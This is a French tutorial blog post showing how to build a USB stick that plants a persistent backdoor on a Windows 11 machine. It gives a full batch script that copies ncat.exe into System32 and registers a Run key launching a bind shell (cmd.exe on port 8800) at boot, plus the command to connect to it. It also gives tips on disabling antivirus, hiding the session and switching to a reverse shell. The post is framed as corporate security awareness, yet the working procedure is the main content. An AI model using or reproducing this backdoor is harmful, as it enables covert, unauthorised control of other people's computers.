Créer une clé USB backdoor pour contrôler un PC distant

Si tu t’intéresses un peu à la cybersécurité, tu as sûrement déjà vu passer des démonstrations de clés USB capables de lancer des scripts ou d’ouvrir une connexion à distance. Avec les systèmes récents comme Windows 11, les choses ont bien évolué.
Mais certaines méthodes restent efficaces — tant qu’on les utilise intelligemment.

Dans ce guide, on va voir comment créer une clé USB qui, une fois branchée, installe une backdoor simple et fonctionnelle. Une fois la machine redémarrée, tu pourras y accéder à distance via un shell.

Comme d'habitude, l’objectif de ce tutoriel est de montrer aux dirigeants d’entreprise à quel point l’utilisation des clés USB peut être dangereuse. Ce qui est valable pour les entreprises l’est tout autant pour les particuliers.

🧰 Ce dont tu as besoin

  • Une clé USB
  • Un ordinateur cible sous Windows 11 (VM ou PC de test)
  • Les droits administrateur sur cette machine
  • L’outil Netcat (Netcat moderne, inclus avec Nmap)
  • Une machine distante sur le même réseau pour établir la connexion

🔧 Étapes de création

1. Préparer la clé USB

Crée un dossier sur ta clé, par exemple :

USB:\backdoor_demo\

Place dedans :

  • ncat.exe (récupéré depuis l’installation de Nmap)
  • Un fichier install_backdoor.bat que tu vas créer dans l’étape suivante

2. Créer le script batch

Dans ce même dossier, crée un fichier nommé install_backdoor.bat, avec le contenu suivant :

@echo off
:: Vérifie les droits administrateur
net session >nul 2>&1
if %errorlevel% neq 0 (
echo [!] Ce script doit être exécuté en tant qu'administrateur.
pause
exit /b
):: Copie Ncat dans System32
copy /Y ncat.exe %SystemRoot%\System32\ncat.exe >nul:: Ajoute une entrée dans le registre pour lancer la backdoor au démarrage
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ncat_backdoor" /t REG_SZ /d "ncat.exe -d -L -e cmd.exe -p 8800" /fecho [+] La backdoor est en place et sera active au prochain démarrage.
pause

Ce script :

  • Vérifie que tu es bien en mode administrateur
  • Copie ncat.exe dans le répertoire système de Windows
  • Ajoute une commande dans le registre pour lancer un shell au démarrage

Tu n’as plus qu’à exécuter ce script manuellement, clic droit > Exécuter en tant qu’administrateur.

3. Écouter la connexion à distance

Une fois que la machine cible a redémarré, la backdoor sera active et à l’écoute sur le port 8800.

Sur ta machine distante, ouvre un terminal et tape la commande suivante :

ncat [IP_de_la_cible] 8800

Remplace [IP_de_la_cible] par l’adresse IP réelle de la machine cible.

Tu obtiens alors un accès direct à son invite de commandes Windows, comme si tu étais devant elle.

Et voilà ! Avec cette technique tu seras en mesure de prendre le contrôle d'un PC à distance. Tu peux faire ce qui tu veux : ouvrir des fichiers, lancer une recherche, exécuter un programme...

Voici une liste des commandes pour bien manipuler la machine à distance: Lise des commandes Windows.

Pour te déconnecter, tape « logout » .

🔒 Quelques remarques utiles

  • Le port 8800 est arbitraire. Tu peux en choisir un autre si nécessaire.
  • Le binaire ncat.exe peut être détecté par l’antivirus. Pour un test en labo, désactive temporairement la protection en temps réel.
  • Cette méthode fonctionne uniquement si la machine cible et la machine d’attaque sont sur le même réseau local (par exemple, le même Wi-Fi ou routeur).
    Si elles sont sur des réseaux différents (Internet), il faut utiliser une variante en reverse shell.
  • Si tu veux éviter que la session soit trop visible, tu peux masquer la fenêtre du shell ou utiliser une version PowerShell en arrière-plan.
  • Tu peux aussi décliner cette méthode avec un payload Python ou un exécutable compilé, si tu veux aller plus loin.

Conclusion

On pourrait croire qu’avec toutes les mises à jour de Windows, les clés USB ne présentent plus de danger… mais comme tu viens de le voir, certaines techniques restent possibles si la personne en face manque de vigilance.

Ce tuto n’est pas là pour apprendre à pirater, mais pour montrer concrètement ce qui reste dangereux aujourd’hui. Comprendre, c’est mieux se défendre.

Faites-en bon usage.

À propos de l'expert

Ahmed el jaouari

Ahmed EL JAOUARI

Ahmed, fondateur de la plateforme FunInformatique, est diplômé en ingénierie des systèmes informatiques et passionné par la cybersécurité. Avec sa plateforme, il propose des guides pratiques et des tutoriels visuels visant à rendre les technologies numériques accessibles à tous, même aux débutants.

Questions & Réponses

Posez votre question